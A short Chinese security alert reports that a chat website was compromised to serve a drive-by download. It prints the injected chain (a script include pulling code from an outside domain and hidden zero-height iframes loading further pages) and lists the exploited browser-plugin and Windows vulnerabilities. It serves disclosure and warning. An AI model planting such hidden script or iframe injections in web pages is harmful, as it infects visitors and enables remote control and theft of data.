| 关键词: 漏洞 代码 问题 框架 hxxp 用户 控件 恶意 病毒 ActiveX |
庆聊网(hxxp://chat.daqing.net/)被黑客植入病毒,用户如果访问该网页,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。 该网站问题代码: <SCRIPT language=javascript src="js/filterpro.js"></SCRIPT> hxxp://chat.daqing.net/js/filterpro.js问题框架代码: <script src=\"hxxp://il3er.cn\"><\/script> hxxp://il3er.cn问题框架代码: <iframe src=hxxp://www.900990.cn/a18/a18.htm width=100 height=0 id=seraph></Iframe> hxxp://www.900990.cn/a18/a18.htm问题框架代码 <iframe src=new.html height=0 width=100 ></iframe> hxxp://www.900990.cn/a18/new.html问题框架代码 该挂马网页通过以下几个漏洞进行传播: 联众世界GLWorld HanGamePluginCn18类ActiveX控件栈溢出漏洞 MS08-041漏洞 暴风影音2 mps.dll组件多个缓冲区溢出漏洞 MS06-014漏洞 Adobe Flash Player SWF文件漏洞 MS09-002漏洞 RealPlayer播放器IERPCtl.IERPCtl.1漏洞 百度搜霸ActiveX控件远程代码执行漏洞 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|